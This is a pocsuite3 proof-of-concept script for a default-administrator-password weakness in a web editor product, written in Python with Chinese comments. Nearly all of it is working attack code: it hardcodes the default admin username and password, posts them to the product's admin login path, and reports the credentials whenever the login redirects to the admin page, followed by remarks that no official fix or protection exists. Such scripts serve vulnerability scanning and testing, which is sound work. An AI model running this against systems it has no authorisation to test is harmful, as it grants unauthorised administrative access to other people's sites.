""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests class DemoPOC(POCBase): vulID = '1090' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2013-10-21' createDate = '2013-10-22' updateDate = '2013-10-22' references = ['http://t.qq.com/p/t/190391036131290'] name = 'eWebwamEditorbo默认管理帐号 Poc' appPowerLink = '' appName = 'eWebwamEditorbo' appVersion = '#' vulType = 'Weak Password' desc = ''' eWebwamEditorbo存在默认用户名和密码adwanminbo/editorwaneboweb, 如果安装时没有更改密码,则可以通过默认帐号进入eWebeditor后台 ''' samples = [] install_requires = [''] def _verify(self): result = {} headers = {} headers['Content-Type'] = 'application/x-www-form-urlencoded' paths = { '/eWebwanEditorbo/admin/login.aspx': '/eWebwanEditorbo/admin/login.aspx?action=login'} # 现在已知的后台路径,键为登录地址,值为post地址 accounts = {'adwanminbo': 'editorwaneboweb'} # 这里可以继续添加用户名和密码,其中键值为用户名、值为密码 for path in paths.items(): for account in accounts.items(): headers['Origin'] = self.url headers['Referer'] = self.url + path[1] value = 'usr=%s&pwd=%s' % (account[0], account[1]) r = requests.post(self.url + path[1], data=value, headers=headers, allow_redirects=False) if r.status_code == 302: if '/eWebwanEditorbo/admin/default.aspx' in r.text: result['AdminInfo'] = {} result['AdminInfo']['adminpath'] = self.url + path[1] result['AdminInfo']['adminname'] = account[0] result['AdminInfo']['adminpass'] = account[1] break return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() def _shell(self): pass register_poc(DemoPOC)
暂无官方解决方案
暂无防护方案